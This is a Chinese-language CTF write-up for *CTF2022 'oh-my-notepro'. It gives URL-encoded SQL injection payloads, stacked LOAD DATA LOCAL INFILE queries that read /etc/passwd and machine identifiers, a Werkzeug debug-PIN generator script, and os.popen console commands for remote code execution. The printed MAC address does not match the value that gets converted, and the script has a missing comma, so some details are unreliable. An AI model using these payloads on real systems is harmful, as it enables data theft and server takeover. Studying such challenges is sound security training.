*CTF2022 oh-my-notepro
文章目录
登录挺宽松就登录了,note-id是在sql数据库中查找的,可以得到notes表名
sql注入
存在sql注入,查看回显点
%27union%20select%201,2,3,4,5;%23
4 5 都是
版本号
%27union%20select%201,2,3,version(),version();%23
查看数据库名称
%27union%20select%201,2,3,version(),database();%23
读表名
%27union%20select%201,2,3,version(),(select%20group_concat(table_name)%20from%20information_schema.tables);%23
注意看最后的那里,和我们的报错是一样的,有notes表,证实了这一点
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,INNODB_LOCKS,INNODB_TRX,INNODB_SYS_DATAFILES,INNODB_LOCK_WAITS,INNODB_SYS_TABLESTATS,INNODB_CMP,INNODB_METRICS,INNODB_CMP_RESET,INNODB_CMP_PER_INDEX,INNODB_CMPMEM_RESET,INNODB_FT_DELETED,INNODB_BUFFER_PAGE_LRU,INNODB_SYS_FOREIGN,INNODB_SYS_COLUMNS,INNODB_SYS_INDEXES,INNODB_FT_DEFAULT_STOPWORD,INNODB_SYS_FIELDS,INNODB_CMP_PER_INDEX_RESET,INNODB_BUFFER_PAGE,INNODB_CMPMEM,INNODB_FT_INDEX_TABLE,INNODB_FT_BEING_DELETED,INNODB_SYS_TABLESPACES,INNODB_FT_INDEX_CACHE,INNODB_SYS_FOREIGN_COLS,INNODB_SYS_TABLES,INNODB_BUFFER_POOL_STATS,INNODB_FT_CONFIG,notes,users
查看users表
%27union%20select%201,2,3,version(),(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27);%23
得到
id,username,password
查看username和password
%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23
root:202cb962ac59075b964b07152d234b70
但是有了这个root和密码,不过好像没啥用
换个思路
读文件,得pin码
loadfiled读文件,通过flask开启了debug模式,然后通过pin码进行RCE
可以读文件之后,题目就和[GYCTF2020]FlaskApp
这个题目很相似了,读一些文件,然后通过大佬的脚本得到pin码
1. 用户名
';create table aaa(name varchar(1000));load data local infile "/etc/passwd" into table ctf.aaa;%23
'union%20select%201,2,3,4,(select%20group_concat(name)%20from%20ctf.aaa);%23
在/etc/passwd中可以得到用户名:ctf
2. app.py路径
3. 读mac
';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23
'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23
将mac地址去掉;
,然后在python中进行转化
02:42:c0:a8:90:03
print(int('0242ac1f0003',16))
2485723369475
4. 读/etc/machine-id
';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23
'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23
1cc402dd0e11d5ae18db04a6de87223d
5. 读/proc/self/cgroup
';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23
'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23
9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7
exp
注意exp的变化,Werkzeug的更新给pin码计算带来了新的变化
直接看官方wp的解释
- md5–>sha1
- /etc/machine-id+/proc/self/cgroup中的id,二者拼接
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
'ctf' #使用用户名
'flask.app', #默认的
'Flask', #默认的
'/usr/local/lib/python3.8/site-packages/flask/app.py' #这个通过报错信息得到
]
private_bits = [
'2485723369475', # 转化之后的mac
#这个是machine-id和/proc/self/cgroup的综合体
'1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
访问http://121.37.153.47:5002/console#
输入pin,导入os模块,查看根目录,运行/readflag
import os
os.popen('ls /').read()
os.popen('/readflag').read()